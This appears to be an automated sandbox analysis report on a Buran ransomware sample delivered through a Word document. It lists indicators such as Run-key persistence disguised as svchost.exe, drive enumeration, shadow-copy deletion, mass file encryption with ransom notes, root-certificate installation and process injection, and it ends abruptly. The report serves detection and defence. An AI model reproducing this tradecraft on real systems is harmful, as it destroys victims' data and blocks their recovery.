buran | 0f81f4eb37083c821598ffd57cff12a082f19ca2de57c86faff65755ef332686

Processes:

mesager43.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run	mesager43.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\svchost.exe\" -start"	mesager43.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

svchost.exe

description	ioc	process
File opened (read-only)	\??\P:	svchost.exe
File opened (read-only)	\??\F:	svchost.exe
File opened (read-only)	\??\E:	svchost.exe
File opened (read-only)	\??\Z:	svchost.exe
File opened (read-only)	\??\Y:	svchost.exe
File opened (read-only)	\??\X:	svchost.exe
File opened (read-only)	\??\T:	svchost.exe
File opened (read-only)	\??\Q:	svchost.exe
File opened (read-only)	\??\B:	svchost.exe
File opened (read-only)	\??\K:	svchost.exe
File opened (read-only)	\??\I:	svchost.exe
File opened (read-only)	\??\G:	svchost.exe
File opened (read-only)	\??\V:	svchost.exe
File opened (read-only)	\??\R:	svchost.exe
File opened (read-only)	\??\O:	svchost.exe
File opened (read-only)	\??\N:	svchost.exe
File opened (read-only)	\??\L:	svchost.exe
File opened (read-only)	\??\A:	svchost.exe
File opened (read-only)	\??\H:	svchost.exe
File opened (read-only)	\??\W:	svchost.exe
File opened (read-only)	\??\U:	svchost.exe
File opened (read-only)	\??\S:	svchost.exe
File opened (read-only)	\??\M:	svchost.exe
File opened (read-only)	\??\J:	svchost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

30 geoiptool.com

flow	ioc
30	geoiptool.com

Modifies service 2 TTPs 4 IoCs

persistence

Modify Registry

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe

Drops file in Program Files directory 24122 IoCs

Processes:

svchost.exe

description	ioc	process
File opened for modification	C:\Program Files\7-Zip\Lang\th.txt.2BE-C57-121	svchost.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png.2BE-C57-121	svchost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraSmallTile.scale-100.png	svchost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\Images\Ratings\Yelp9.scale-100.png	svchost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-tw\ui-strings.js.2BE-C57-121	svchost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\text_2x.png.2BE-C57-121	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\msjet.xsl	svchost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\CoreEngine.winmd	svchost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNotePageLargeTile.scale-200.png	svchost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ca-es\ui-strings.js	svchost.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\db\3RDPARTY.2BE-C57-121	svchost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_1.4.101.0_neutral_~_8wekyb3d8bbwe\AppxBlockMap.xml	svchost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.contrast-black_targetsize-64.png	svchost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\selector.js	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019MSDNR_Retail-pl.xrm-ms	svchost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\images\bell_empty.png.2BE-C57-121	svchost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\af_get.svg.2BE-C57-121	svchost.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ru-ru\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	svchost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\AdobePiStd.otf.2BE-C57-121	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-white_scale-80.png.2BE-C57-121	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\HintBarEllipses.16.GrayF@3x.png	svchost.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\modules\dkjson.luac.2BE-C57-121	svchost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\WorldClockSmallTile.contrast-black_scale-100.png	svchost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nl-nl\ui-strings.js	svchost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\rhp_world_icon.png	svchost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Autumn\autumn_12s.png	svchost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Comments.aapp	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyoptionaltools.jar	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\include\win32\jni_md.h.2BE-C57-121	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.scale-180.png	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-checkmark@4x.png	svchost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\Assets\Fonts\MsgMDL2.ttf	svchost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sl-sl\ui-strings.js.2BE-C57-121	svchost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\pt-br\ui-strings.js	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStdR_OEM_Perp-ul-oob.xrm-ms	svchost.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\LTR\contrast-black\LargeTile.scale-125.png	svchost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\9.jpg	svchost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\MapsSmallTile.scale-100.png	svchost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\pt-br\ui-strings.js.2BE-C57-121	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_Grace-ul-oob.xrm-ms	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\HintBarEllipses.16.GrayF@3x.png.2BE-C57-121	svchost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSectionGroupMedTile.scale-200.png	svchost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\he-il\ui-strings.js.2BE-C57-121	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_ja_4.4.0.v20140623020002.jar	svchost.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-125_8wekyb3d8bbwe\Assets\contrast-black\SplashScreen.scale-125_contrast-black.png	svchost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\bandit.png	svchost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\s_thumbnailview_18.svg.2BE-C57-121	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial5-ppd.xrm-ms.2BE-C57-121	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\BORDERS\MSART1.BDR	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\BORDERS\MSART8.BDR.2BE-C57-121	svchost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Place\contrast-black\MedTile.scale-100.png	svchost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\Microsoft.Xbox.NetworkTroubleshooter.winmd	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\AccessVL_KMS_Client-ul-oob.xrm-ms	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProO365R_Subscription-pl.xrm-ms.2BE-C57-121	svchost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-il\ui-strings.js	svchost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\he-il\ui-strings.js.2BE-C57-121	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Professional2019R_Trial-pl.xrm-ms.2BE-C57-121	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStdCO365R_Subscription-ppd.xrm-ms	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\offsymt.ttf	svchost.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-125_8wekyb3d8bbwe\Assets\SmallLogo.scale-125.png	svchost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-ma\ui-strings.js.2BE-C57-121	svchost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\hr-hr\ui-strings.js	svchost.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Delays execution with timeout.exe 4 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exe

pid process

2880 timeout.exe
3468 timeout.exe
3836 timeout.exe
3148 timeout.exe

pid	process
2880	timeout.exe
3468	timeout.exe
3836	timeout.exe
3148	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exe

pid process

1620 vssadmin.exe
2496 vssadmin.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

3424 taskkill.exe
3024 taskkill.exe

pid	process
1620	vssadmin.exe
2496	vssadmin.exe

pid	process
3424	taskkill.exe
3024	taskkill.exe

Modifies registry class 2 IoCs

Processes:

Bw99ofg.execmd.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	Bw99ofg.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	cmd.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

mesager43.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	mesager43.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	mesager43.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

644 WINWORD.EXE
644 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

3852 powershell.exe
3852 powershell.exe
3852 powershell.exe

pid	process
644	WINWORD.EXE
644	WINWORD.EXE

pid	process
3852	powershell.exe
3852	powershell.exe
3852	powershell.exe

Suspicious use of AdjustPrivilegeToken 94 IoCs

Processes:

powershell.exemesager43.exetaskkill.exetaskkill.exeWMIC.exeWMIC.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	3852	powershell.exe
Token: SeDebugPrivilege	3704	mesager43.exe
Token: SeDebugPrivilege	3704	mesager43.exe
Token: SeDebugPrivilege	3424	taskkill.exe
Token: SeDebugPrivilege	3024	taskkill.exe
Token: SeIncreaseQuotaPrivilege	984	WMIC.exe
Token: SeSecurityPrivilege	984	WMIC.exe
Token: SeTakeOwnershipPrivilege	984	WMIC.exe
Token: SeLoadDriverPrivilege	984	WMIC.exe
Token: SeSystemProfilePrivilege	984	WMIC.exe
Token: SeSystemtimePrivilege	984	WMIC.exe
Token: SeProfSingleProcessPrivilege	984	WMIC.exe
Token: SeIncBasePriorityPrivilege	984	WMIC.exe
Token: SeCreatePagefilePrivilege	984	WMIC.exe
Token: SeBackupPrivilege	984	WMIC.exe
Token: SeRestorePrivilege	984	WMIC.exe
Token: SeShutdownPrivilege	984	WMIC.exe
Token: SeDebugPrivilege	984	WMIC.exe
Token: SeSystemEnvironmentPrivilege	984	WMIC.exe
Token: SeRemoteShutdownPrivilege	984	WMIC.exe
Token: SeUndockPrivilege	984	WMIC.exe
Token: SeManageVolumePrivilege	984	WMIC.exe
Token: 33	984	WMIC.exe
Token: 34	984	WMIC.exe
Token: 35	984	WMIC.exe
Token: 36	984	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2740	WMIC.exe
Token: SeSecurityPrivilege	2740	WMIC.exe
Token: SeTakeOwnershipPrivilege	2740	WMIC.exe
Token: SeLoadDriverPrivilege	2740	WMIC.exe
Token: SeSystemProfilePrivilege	2740	WMIC.exe
Token: SeSystemtimePrivilege	2740	WMIC.exe
Token: SeProfSingleProcessPrivilege	2740	WMIC.exe
Token: SeIncBasePriorityPrivilege	2740	WMIC.exe
Token: SeCreatePagefilePrivilege	2740	WMIC.exe
Token: SeBackupPrivilege	2740	WMIC.exe
Token: SeRestorePrivilege	2740	WMIC.exe
Token: SeShutdownPrivilege	2740	WMIC.exe
Token: SeDebugPrivilege	2740	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2740	WMIC.exe
Token: SeRemoteShutdownPrivilege	2740	WMIC.exe
Token: SeUndockPrivilege	2740	WMIC.exe
Token: SeManageVolumePrivilege	2740	WMIC.exe
Token: 33	2740	WMIC.exe
Token: 34	2740	WMIC.exe
Token: 35	2740	WMIC.exe
Token: 36	2740	WMIC.exe
Token: SeBackupPrivilege	2228	vssvc.exe
Token: SeRestorePrivilege	2228	vssvc.exe
Token: SeAuditPrivilege	2228	vssvc.exe
Token: SeIncreaseQuotaPrivilege	2740	WMIC.exe
Token: SeIncreaseQuotaPrivilege	984	WMIC.exe
Token: SeSecurityPrivilege	2740	WMIC.exe
Token: SeSecurityPrivilege	984	WMIC.exe
Token: SeTakeOwnershipPrivilege	2740	WMIC.exe
Token: SeLoadDriverPrivilege	2740	WMIC.exe
Token: SeTakeOwnershipPrivilege	984	WMIC.exe
Token: SeSystemProfilePrivilege	2740	WMIC.exe
Token: SeLoadDriverPrivilege	984	WMIC.exe
Token: SeSystemtimePrivilege	2740	WMIC.exe
Token: SeSystemProfilePrivilege	984	WMIC.exe
Token: SeProfSingleProcessPrivilege	2740	WMIC.exe
Token: SeSystemtimePrivilege	984	WMIC.exe
Token: SeIncBasePriorityPrivilege	2740	WMIC.exe

Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

WINWORD.EXE

pid process

644 WINWORD.EXE
644 WINWORD.EXE
644 WINWORD.EXE
644 WINWORD.EXE
644 WINWORD.EXE
644 WINWORD.EXE
644 WINWORD.EXE

pid	process
644	WINWORD.EXE
644	WINWORD.EXE
644	WINWORD.EXE
644	WINWORD.EXE
644	WINWORD.EXE
644	WINWORD.EXE
644	WINWORD.EXE

Suspicious use of WriteProcessMemory 94 IoCs

Processes:

cmd.exeBw99ofg.exeWScript.execmd.exeWScript.execmd.exemesager43.exesvchost.exe

description	pid	process	target process
PID 2100 wrote to memory of 2716	2100	cmd.exe	msg.exe
PID 2100 wrote to memory of 2716	2100	cmd.exe	msg.exe
PID 2100 wrote to memory of 3852	2100	cmd.exe	powershell.exe
PID 2100 wrote to memory of 3852	2100	cmd.exe	powershell.exe
PID 2164 wrote to memory of 3252	2164	Bw99ofg.exe	WScript.exe
PID 2164 wrote to memory of 3252	2164	Bw99ofg.exe	WScript.exe
PID 2164 wrote to memory of 3252	2164	Bw99ofg.exe	WScript.exe
PID 3252 wrote to memory of 2092	3252	WScript.exe	cmd.exe
PID 3252 wrote to memory of 2092	3252	WScript.exe	cmd.exe
PID 3252 wrote to memory of 2092	3252	WScript.exe	cmd.exe
PID 2092 wrote to memory of 980	2092	cmd.exe	15sp.exe
PID 2092 wrote to memory of 980	2092	cmd.exe	15sp.exe
PID 2092 wrote to memory of 980	2092	cmd.exe	15sp.exe
PID 2092 wrote to memory of 3148	2092	cmd.exe	timeout.exe
PID 2092 wrote to memory of 3148	2092	cmd.exe	timeout.exe
PID 2092 wrote to memory of 3148	2092	cmd.exe	timeout.exe
PID 2092 wrote to memory of 1168	2092	cmd.exe	WScript.exe
PID 2092 wrote to memory of 1168	2092	cmd.exe	WScript.exe
PID 2092 wrote to memory of 1168	2092	cmd.exe	WScript.exe
PID 2092 wrote to memory of 2880	2092	cmd.exe	timeout.exe
PID 2092 wrote to memory of 2880	2092	cmd.exe	timeout.exe
PID 2092 wrote to memory of 2880	2092	cmd.exe	timeout.exe
PID 1168 wrote to memory of 2532	1168	WScript.exe	cmd.exe
PID 1168 wrote to memory of 2532	1168	WScript.exe	cmd.exe
PID 1168 wrote to memory of 2532	1168	WScript.exe	cmd.exe
PID 2532 wrote to memory of 3680	2532	cmd.exe	attrib.exe
PID 2532 wrote to memory of 3680	2532	cmd.exe	attrib.exe
PID 2532 wrote to memory of 3680	2532	cmd.exe	attrib.exe
PID 2532 wrote to memory of 3468	2532	cmd.exe	timeout.exe
PID 2532 wrote to memory of 3468	2532	cmd.exe	timeout.exe
PID 2532 wrote to memory of 3468	2532	cmd.exe	timeout.exe
PID 2532 wrote to memory of 3704	2532	cmd.exe	mesager43.exe
PID 2532 wrote to memory of 3704	2532	cmd.exe	mesager43.exe
PID 2532 wrote to memory of 3704	2532	cmd.exe	mesager43.exe
PID 3704 wrote to memory of 3692	3704	mesager43.exe	svchost.exe
PID 3704 wrote to memory of 3692	3704	mesager43.exe	svchost.exe
PID 3704 wrote to memory of 3692	3704	mesager43.exe	svchost.exe
PID 3704 wrote to memory of 3364	3704	mesager43.exe	notepad.exe
PID 3704 wrote to memory of 3364	3704	mesager43.exe	notepad.exe
PID 3704 wrote to memory of 3364	3704	mesager43.exe	notepad.exe
PID 3704 wrote to memory of 3364	3704	mesager43.exe	notepad.exe
PID 3704 wrote to memory of 3364	3704	mesager43.exe	notepad.exe
PID 3704 wrote to memory of 3364	3704	mesager43.exe	notepad.exe
PID 2532 wrote to memory of 3424	2532	cmd.exe	taskkill.exe
PID 2532 wrote to memory of 3424	2532	cmd.exe	taskkill.exe
PID 2532 wrote to memory of 3424	2532	cmd.exe	taskkill.exe
PID 2532 wrote to memory of 3024	2532	cmd.exe	taskkill.exe
PID 2532 wrote to memory of 3024	2532	cmd.exe	taskkill.exe
PID 2532 wrote to memory of 3024	2532	cmd.exe	taskkill.exe
PID 2532 wrote to memory of 2172	2532	cmd.exe	attrib.exe
PID 2532 wrote to memory of 2172	2532	cmd.exe	attrib.exe
PID 2532 wrote to memory of 2172	2532	cmd.exe	attrib.exe
PID 2532 wrote to memory of 3836	2532	cmd.exe	timeout.exe
PID 2532 wrote to memory of 3836	2532	cmd.exe	timeout.exe
PID 2532 wrote to memory of 3836	2532	cmd.exe	timeout.exe
PID 3692 wrote to memory of 3992	3692	svchost.exe	cmd.exe
PID 3692 wrote to memory of 3992	3692	svchost.exe	cmd.exe
PID 3692 wrote to memory of 3992	3692	svchost.exe	cmd.exe
PID 3692 wrote to memory of 2304	3692	svchost.exe	cmd.exe
PID 3692 wrote to memory of 2304	3692	svchost.exe	cmd.exe
PID 3692 wrote to memory of 2304	3692	svchost.exe	cmd.exe
PID 3692 wrote to memory of 3780	3692	svchost.exe	cmd.exe
PID 3692 wrote to memory of 3780	3692	svchost.exe	cmd.exe
PID 3692 wrote to memory of 3780	3692	svchost.exe	cmd.exe

Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exe

pid process

3680 attrib.exe
2172 attrib.exe

pid	process
3680	attrib.exe
2172	attrib.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Delivery-77426522.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:644

C:\Windows\system32\cmd.exe
